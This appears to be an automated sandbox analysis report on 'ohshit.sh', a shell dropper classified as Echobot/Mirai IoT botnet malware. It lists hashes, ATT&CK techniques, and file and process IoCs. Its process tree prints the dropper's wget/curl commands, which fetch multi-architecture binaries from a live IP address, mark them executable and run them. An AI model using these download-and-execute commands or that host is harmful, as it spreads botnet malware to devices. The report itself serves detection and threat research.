echobot | b86582605641a45410c0811cec9d1d19deb98bb5c4f5cd27caa06949e2ec7e30

Analysis

max time kernel
149s
max time network
150s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
25-11-2024 21:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

2KB
MD5

81eee2b1d28af46c8e9190b0c20fce28
SHA1

8025e6d6f83b129d6c7a11a684d5d6f54d160333
SHA256

b86582605641a45410c0811cec9d1d19deb98bb5c4f5cd27caa06949e2ec7e30
SHA512

359baa5371f4f8cbd4c3caf9cb1b02624b22d8cadd63722c2a9db673e73df55f6f75988e988911ee731e3b30b5a1c22207cd9a8aebb933c38bab17f9a1f8df45

Score

10^/10

echobot mirai botnet defense_evasion discovery trojan

Malware Config

Signatures

Detected Echobot 1 IoCs

Processes:

resource yara_rule

/tmp/Chaotic family_echobot
Echobot
An updated variant of Mirai which infects a wide range of IoT devices to form a botnet.
botnet trojan echobot
Echobot family
echobot
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (131682) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid process

1656 chmod
1556 chmod
1586 chmod
1600 chmod
1614 chmod
1628 chmod
1526 chmod
1542 chmod
1642 chmod
1570 chmod
1670 chmod
1698 chmod
1507 chmod
1512 chmod
1684 chmod

resource	yara_rule
/tmp/Chaotic	family_echobot

pid	process
1656	chmod
1556	chmod
1586	chmod
1600	chmod
1614	chmod
1628	chmod
1526	chmod
1542	chmod
1642	chmod
1570	chmod
1670	chmod
1698	chmod
1507	chmod
1512	chmod
1684	chmod

Executes dropped EXE 15 IoCs

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

ioc	pid	process
/tmp/Chaotic	1508	Chaotic
/tmp/Chaotic	1513	Chaotic
/tmp/Chaotic	1527	Chaotic
/tmp/Chaotic	1543	Chaotic
/tmp/Chaotic	1557	Chaotic
/tmp/Chaotic	1571	Chaotic
/tmp/Chaotic	1587	Chaotic
/tmp/Chaotic	1601	Chaotic
/tmp/Chaotic	1615	Chaotic
/tmp/Chaotic	1629	Chaotic
/tmp/Chaotic	1643	Chaotic
/tmp/Chaotic	1657	Chaotic
/tmp/Chaotic	1671	Chaotic
/tmp/Chaotic	1685	Chaotic
/tmp/Chaotic	1699	Chaotic

Modifies Watchdog functionality 1 TTPs 28 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

description	ioc	process
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic

Enumerates active TCP sockets 1 TTPs 14 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

description	ioc	process
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic

Enumerates running processes
Discovers information about currently running processes on the system

Changes its process name 14 IoCs

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

description	pid	process
Changes the process name, possibly in an attempt to hide itself	1513	Chaotic
Changes the process name, possibly in an attempt to hide itself	1527	Chaotic
Changes the process name, possibly in an attempt to hide itself	1543	Chaotic
Changes the process name, possibly in an attempt to hide itself	1557	Chaotic
Changes the process name, possibly in an attempt to hide itself	1571	Chaotic
Changes the process name, possibly in an attempt to hide itself	1587	Chaotic
Changes the process name, possibly in an attempt to hide itself	1601	Chaotic
Changes the process name, possibly in an attempt to hide itself	1615	Chaotic
Changes the process name, possibly in an attempt to hide itself	1629	Chaotic
Changes the process name, possibly in an attempt to hide itself	1643	Chaotic
Changes the process name, possibly in an attempt to hide itself	1657	Chaotic
Changes the process name, possibly in an attempt to hide itself	1671	Chaotic
Changes the process name, possibly in an attempt to hide itself	1685	Chaotic
Changes the process name, possibly in an attempt to hide itself	1699	Chaotic

Reads system network configuration 1 TTPs 14 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

description	ioc	process
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

description	ioc	process
File opened for reading	/proc/1106/fd	Chaotic
File opened for reading	/proc/577/fd	Chaotic
File opened for reading	/proc/404/fd	Chaotic
File opened for reading	/proc/314/fd	Chaotic
File opened for reading	/proc/1111/fd	Chaotic
File opened for reading	/proc/1336/fd	Chaotic
File opened for reading	/proc/683/fd	Chaotic
File opened for reading	/proc/1178/fd	Chaotic
File opened for reading	/proc/1529/fd	Chaotic
File opened for reading	/proc/1469/fd	Chaotic
File opened for reading	/proc/1119/fd	Chaotic
File opened for reading	/proc/755/fd	Chaotic
File opened for reading	/proc/516/fd	Chaotic
File opened for reading	/proc/1135/fd	Chaotic
File opened for reading	/proc/1146/fd	Chaotic
File opened for reading	/proc/1249/fd	Chaotic
File opened for reading	/proc/1062/fd	Chaotic
File opened for reading	/proc/1502/fd	Chaotic
File opened for reading	/proc/536/fd	Chaotic
File opened for reading	/proc/477/fd	Chaotic
File opened for reading	/proc/662/fd	Chaotic
File opened for reading	/proc/1058/fd	Chaotic
File opened for reading	/proc/1032/fd	Chaotic
File opened for reading	/proc/1151/fd	Chaotic
File opened for reading	/proc/1183/fd	Chaotic
File opened for reading	/proc/979/fd	Chaotic
File opened for reading	/proc/596/exe	Chaotic
File opened for reading	/proc/1177/fd	Chaotic
File opened for reading	/proc/1336/fd	Chaotic
File opened for reading	/proc/1185/fd	Chaotic
File opened for reading	/proc/319/fd	Chaotic
File opened for reading	/proc/430/fd	Chaotic
File opened for reading	/proc/1219/fd	Chaotic
File opened for reading	/proc/755/fd	Chaotic
File opened for reading	/proc/907/fd	Chaotic
File opened for reading	/proc/1140/fd	Chaotic
File opened for reading	/proc/477/exe	Chaotic
File opened for reading	/proc/1003/fd	Chaotic
File opened for reading	/proc/1310/fd	Chaotic
File opened for reading	/proc/907/fd	Chaotic
File opened for reading	/proc/555/fd	Chaotic
File opened for reading	/proc/1219/fd	Chaotic
File opened for reading	/proc/525/exe	Chaotic
File opened for reading	/proc/1280/fd	Chaotic
File opened for reading	/proc/525/fd	Chaotic
File opened for reading	/proc/536/fd	Chaotic
File opened for reading	/proc/1335/fd	Chaotic
File opened for reading	/proc/683/fd	Chaotic
File opened for reading	/proc/683/fd	Chaotic
File opened for reading	/proc/1502/fd	Chaotic
File opened for reading	/proc/1185/fd	Chaotic
File opened for reading	/proc/598/fd	Chaotic
File opened for reading	/proc/477/fd	Chaotic
File opened for reading	/proc/1218/fd	Chaotic
File opened for reading	/proc/1106/fd	Chaotic
File opened for reading	/proc/1336/fd	Chaotic
File opened for reading	/proc/1155/fd	Chaotic
File opened for reading	/proc/683/fd	Chaotic
File opened for reading	/proc/1155/fd	Chaotic
File opened for reading	/proc/867/fd	Chaotic
File opened for reading	/proc/516/fd	Chaotic
File opened for reading	/proc/446/fd	Chaotic
File opened for reading	/proc/1008/fd	Chaotic
File opened for reading	/proc/477/fd	Chaotic

System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

wgetcurlwgetcurl

pid process

1547 wget
1554 curl
1561 wget
1568 curl

pid	process
1547	wget
1554	curl
1561	wget
1568	curl

Writes file to tmp directory 27 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlwgetwgetwgetcurlcurlwgetcurlcurlohshit.shcurlwgetcurlcurlwgetcurlwgetcurlcurlcpwgetcurlwgetcurlcurlcurlwget

description	ioc	process
File opened for modification	/tmp/jade.x86	curl
File opened for modification	/tmp/jade.mips	wget
File opened for modification	/tmp/jade.arm	wget
File opened for modification	/tmp/jade.mpsl	wget
File opened for modification	/tmp/jade.arm	curl
File opened for modification	/tmp/jade.arm5	curl
File opened for modification	/tmp/jade.arm7	wget
File opened for modification	/tmp/jade.arm7	curl
File opened for modification	/tmp/jade.sparc	curl
File opened for modification	/tmp/Chaotic	ohshit.sh
File opened for modification	/tmp/jade.arm6	curl
File opened for modification	/tmp/jade.ppc	wget
File opened for modification	/tmp/jade.arc	curl
File opened for modification	/tmp/jade.i686	curl
File opened for modification	/tmp/jade.arm5	wget
File opened for modification	/tmp/jade.sh4	curl
File opened for modification	/tmp/jade.arm6	wget
File opened for modification	/tmp/jade.mips	curl
File opened for modification	/tmp/jade.m68k	curl
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/jade.x86	wget
File opened for modification	/tmp/jade.mips64	curl
File opened for modification	/tmp/jade.sh4	wget
File opened for modification	/tmp/jade.x86_64	curl
File opened for modification	/tmp/jade.mpsl	curl
File opened for modification	/tmp/jade.ppc	curl
File opened for modification	/tmp/jade.m68k	wget

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Writes file to tmp directory
PID:1496
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Writes file to tmp directory
  PID:1497
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.arc
  2⤵
  PID:1500
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.arc
  2⤵
  - Writes file to tmp directory
  PID:1505
- /bin/cat
  cat jade.arc
  2⤵
  PID:1506
- /bin/chmod
  chmod +x busybox Chaotic config-err-riqIjM jade.arc netplan_f9q45fhs ohshit.sh snap-private-tmp ssh-u65xuxWJtjA0 systemd-private-fe3170d5648a4955adb5eb655984c096-bolt.service-FJNGiw systemd-private-fe3170d5648a4955adb5eb655984c096-colord.service-f4UabB systemd-private-fe3170d5648a4955adb5eb655984c096-ModemManager.service-Z0ax5V systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-resolved.service-bo9PN9 systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-timedated.service-t2ol62
  2⤵
  - File and Directory Permissions Modification
  PID:1507
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:1508
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.x86
  2⤵
  - Writes file to tmp directory
  PID:1509
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.x86
  2⤵
  - Writes file to tmp directory
  PID:1510
- /bin/cat
  cat jade.x86
  2⤵
  PID:1511
- /bin/chmod
  chmod +x busybox Chaotic config-err-riqIjM jade.arc jade.x86 netplan_f9q45fhs ohshit.sh snap-private-tmp ssh-u65xuxWJtjA0 systemd-private-fe3170d5648a4955adb5eb655984c096-bolt.service-FJNGiw systemd-private-fe3170d5648a4955adb5eb655984c096-colord.service-f4UabB systemd-private-fe3170d5648a4955adb5eb655984c096-ModemManager.service-Z0ax5V systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-resolved.service-bo9PN9 systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-timedated.service-t2ol62
  2⤵
  - File and Directory Permissions Modification
  PID:1512
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  PID:1513
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.x86_64
  2⤵
  PID:1517
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1524
- /bin/chmod
  chmod +x busybox Chaotic config-err-riqIjM jade.arc jade.x86 jade.x86_64 netplan_f9q45fhs ohshit.sh snap-private-tmp ssh-u65xuxWJtjA0 systemd-private-fe3170d5648a4955adb5eb655984c096-bolt.service-FJNGiw systemd-private-fe3170d5648a4955adb5eb655984c096-colord.service-f4UabB systemd-private-fe3170d5648a4955adb5eb655984c096-ModemManager.service-Z0ax5V systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-resolved.service-bo9PN9 systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-timedated.service-t2ol62
  2⤵
  - File and Directory Permissions Modification
  PID:1526
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1527
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.i686
  2⤵
  PID:1533
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.i686
  2⤵
  - Writes file to tmp directory
  PID:1540
- /bin/chmod
  chmod +x busybox Chaotic config-err-riqIjM jade.arc jade.i686 jade.x86 jade.x86_64 netplan_f9q45fhs ohshit.sh snap-private-tmp ssh-u65xuxWJtjA0 systemd-private-fe3170d5648a4955adb5eb655984c096-bolt.service-FJNGiw systemd-private-fe3170d5648a4955adb5eb655984c096-colord.service-f4UabB systemd-private-fe3170d5648a4955adb5eb655984c096-ModemManager.service-Z0ax5V systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-resolved.service-bo9PN9 systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-timedated.service-t2ol62
  2⤵
  - File and Directory Permissions Modification
  PID:1542
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1543
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1547
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1554
- /bin/chmod
  chmod +x busybox Chaotic config-err-riqIjM jade.arc jade.i686 jade.mips jade.x86 jade.x86_64 netplan_f9q45fhs ohshit.sh snap-private-tmp ssh-u65xuxWJtjA0 systemd-private-fe3170d5648a4955adb5eb655984c096-bolt.service-FJNGiw systemd-private-fe3170d5648a4955adb5eb655984c096-colord.service-f4UabB systemd-private-fe3170d5648a4955adb5eb655984c096-ModemManager.service-Z0ax5V systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-resolved.service-bo9PN9 systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-timedated.service-t2ol62
  2⤵
  - File and Directory Permissions Modification
  PID:1556
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1557
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.mips64
  2⤵
  - System Network Configuration Discovery
  PID:1561
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.mips64
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1568
- /bin/chmod
  chmod +x busybox Chaotic config-err-riqIjM jade.arc jade.i686 jade.mips jade.mips64 jade.x86 jade.x86_64 netplan_f9q45fhs ohshit.sh snap-private-tmp ssh-u65xuxWJtjA0 systemd-private-fe3170d5648a4955adb5eb655984c096-bolt.service-FJNGiw systemd-private-fe3170d5648a4955adb5eb655984c096-colord.service-f4UabB systemd-private-fe3170d5648a4955adb5eb655984c096-ModemManager.service-Z0ax5V systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-resolved.service-bo9PN9 systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-timedated.service-t2ol62
  2⤵
  - File and Directory Permissions Modification
  PID:1570
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1571
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1577
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1584
- /bin/chmod
  chmod +x busybox Chaotic config-err-riqIjM jade.arc jade.i686 jade.mips jade.mips64 jade.mpsl jade.x86 jade.x86_64 netplan_f9q45fhs ohshit.sh snap-private-tmp ssh-u65xuxWJtjA0 systemd-private-fe3170d5648a4955adb5eb655984c096-bolt.service-FJNGiw systemd-private-fe3170d5648a4955adb5eb655984c096-colord.service-f4UabB systemd-private-fe3170d5648a4955adb5eb655984c096-ModemManager.service-Z0ax5V systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-resolved.service-bo9PN9
  2⤵
  - File and Directory Permissions Modification
  PID:1586
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1587
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.arm
  2⤵
  - Writes file to tmp directory
  PID:1591
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.arm
  2⤵
  - Writes file to tmp directory
  PID:1598
- /bin/chmod
  chmod +x busybox Chaotic config-err-riqIjM jade.arc jade.arm jade.i686 jade.mips jade.mips64 jade.mpsl jade.x86 jade.x86_64 netplan_f9q45fhs ohshit.sh snap-private-tmp ssh-u65xuxWJtjA0 systemd-private-fe3170d5648a4955adb5eb655984c096-bolt.service-FJNGiw systemd-private-fe3170d5648a4955adb5eb655984c096-colord.service-f4UabB systemd-private-fe3170d5648a4955adb5eb655984c096-ModemManager.service-Z0ax5V systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-resolved.service-bo9PN9
  2⤵
  - File and Directory Permissions Modification
  PID:1600
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1601
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.arm5
  2⤵
  - Writes file to tmp directory
  PID:1605
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.arm5
  2⤵
  - Writes file to tmp directory
  PID:1612
- /bin/chmod
  chmod +x busybox Chaotic config-err-riqIjM jade.arc jade.arm jade.arm5 jade.i686 jade.mips jade.mips64 jade.mpsl jade.x86 jade.x86_64 netplan_f9q45fhs ohshit.sh snap-private-tmp ssh-u65xuxWJtjA0 systemd-private-fe3170d5648a4955adb5eb655984c096-bolt.service-FJNGiw systemd-private-fe3170d5648a4955adb5eb655984c096-colord.service-f4UabB systemd-private-fe3170d5648a4955adb5eb655984c096-ModemManager.service-Z0ax5V systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-resolved.service-bo9PN9
  2⤵
  - File and Directory Permissions Modification
  PID:1614
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1615
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.arm6
  2⤵
  - Writes file to tmp directory
  PID:1619
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.arm6
  2⤵
  - Writes file to tmp directory
  PID:1626
- /bin/chmod
  chmod +x busybox Chaotic config-err-riqIjM jade.arc jade.arm jade.arm5 jade.arm6 jade.i686 jade.mips jade.mips64 jade.mpsl jade.x86 jade.x86_64 netplan_f9q45fhs ohshit.sh snap-private-tmp ssh-u65xuxWJtjA0 systemd-private-fe3170d5648a4955adb5eb655984c096-bolt.service-FJNGiw systemd-private-fe3170d5648a4955adb5eb655984c096-colord.service-f4UabB systemd-private-fe3170d5648a4955adb5eb655984c096-ModemManager.service-Z0ax5V systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-resolved.service-bo9PN9
  2⤵
  - File and Directory Permissions Modification
  PID:1628
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1629
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.arm7
  2⤵
  - Writes file to tmp directory
  PID:1633
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.arm7
  2⤵
  - Writes file to tmp directory
  PID:1640
- /bin/chmod
  chmod +x busybox Chaotic config-err-riqIjM jade.arc jade.arm jade.arm5 jade.arm6 jade.arm7 jade.i686 jade.mips jade.mips64 jade.mpsl jade.x86 jade.x86_64 netplan_f9q45fhs ohshit.sh snap-private-tmp ssh-u65xuxWJtjA0 systemd-private-fe3170d5648a4955adb5eb655984c096-bolt.service-FJNGiw systemd-private-fe3170d5648a4955adb5eb655984c096-colord.service-f4UabB systemd-private-fe3170d5648a4955adb5eb655984c096-ModemManager.service-Z0ax5V systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-resolved.service-bo9PN9
  2⤵
  - File and Directory Permissions Modification
  PID:1642
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1643
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.ppc
  2⤵
  - Writes file to tmp directory
  PID:1647
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.ppc
  2⤵
  - Writes file to tmp directory
  PID:1654
- /bin/chmod
  chmod +x busybox Chaotic config-err-riqIjM jade.arc jade.arm jade.arm5 jade.arm6 jade.arm7 jade.i686 jade.mips jade.mips64 jade.mpsl jade.ppc jade.x86 jade.x86_64 netplan_f9q45fhs ohshit.sh snap-private-tmp ssh-u65xuxWJtjA0 systemd-private-fe3170d5648a4955adb5eb655984c096-bolt.service-FJNGiw systemd-private-fe3170d5648a4955adb5eb655984c096-colord.service-f4UabB systemd-private-fe3170d5648a4955adb5eb655984c096-ModemManager.service-Z0ax5V systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-resolved.service-bo9PN9
  2⤵
  - File and Directory Permissions Modification
  PID:1656
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1657
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.sparc
  2⤵
  PID:1661
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.sparc
  2⤵
  - Writes file to tmp directory
  PID:1668
- /bin/chmod
  chmod +x busybox Chaotic config-err-riqIjM jade.arc jade.arm jade.arm5 jade.arm6 jade.arm7 jade.i686 jade.mips jade.mips64 jade.mpsl jade.ppc jade.sparc jade.x86 jade.x86_64 netplan_f9q45fhs ohshit.sh snap-private-tmp ssh-u65xuxWJtjA0 systemd-private-fe3170d5648a4955adb5eb655984c096-bolt.service-FJNGiw systemd-private-fe3170d5648a4955adb5eb655984c096-colord.service-f4UabB systemd-private-fe3170d5648a4955adb5eb655984c096-ModemManager.service-Z0ax5V systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-resolved.service-bo9PN9
  2⤵
  - File and Directory Permissions Modification
  PID:1670
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1671
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.m68k
  2⤵
  - Writes file to tmp directory
  PID:1675
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.m68k
  2⤵
  - Writes file to tmp directory
  PID:1682
- /bin/chmod
  chmod +x busybox Chaotic config-err-riqIjM jade.arc jade.arm jade.arm5 jade.arm6 jade.arm7 jade.i686 jade.m68k jade.mips jade.mips64 jade.mpsl jade.ppc jade.sparc jade.x86 jade.x86_64 netplan_f9q45fhs ohshit.sh snap-private-tmp ssh-u65xuxWJtjA0 systemd-private-fe3170d5648a4955adb5eb655984c096-bolt.service-FJNGiw systemd-private-fe3170d5648a4955adb5eb655984c096-colord.service-f4UabB systemd-private-fe3170d5648a4955adb5eb655984c096-ModemManager.service-Z0ax5V systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-resolved.service-bo9PN9
  2⤵
  - File and Directory Permissions Modification
  PID:1684
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1685
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.sh4
  2⤵
  - Writes file to tmp directory
  PID:1689
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.sh4
  2⤵
  - Writes file to tmp directory
  PID:1696
- /bin/chmod
  chmod +x busybox Chaotic config-err-riqIjM jade.arc jade.arm jade.arm5 jade.arm6 jade.arm7 jade.i686 jade.m68k jade.mips jade.mips64 jade.mpsl jade.ppc jade.sh4 jade.sparc jade.x86 jade.x86_64 netplan_f9q45fhs ohshit.sh snap-private-tmp ssh-u65xuxWJtjA0 systemd-private-fe3170d5648a4955adb5eb655984c096-bolt.service-FJNGiw systemd-private-fe3170d5648a4955adb5eb655984c096-colord.service-f4UabB systemd-private-fe3170d5648a4955adb5eb655984c096-ModemManager.service-Z0ax5V systemd-private-fe3170d5648a4955adb5eb655984c096-systemd-resolved.service-bo9PN9
  2⤵
  - File and Directory Permissions Modification
  PID:1698
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1699

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Chaotic

Filesize
68KB

MD5
60e197919a265617f21c21e25320c549

SHA1
b06f09b251f855c2e3cadbee08e426be790698cf

SHA256
bd145676c6767709d39d47eb2bb2fe5051b790db64bf150b233d3f49438346b2

SHA512
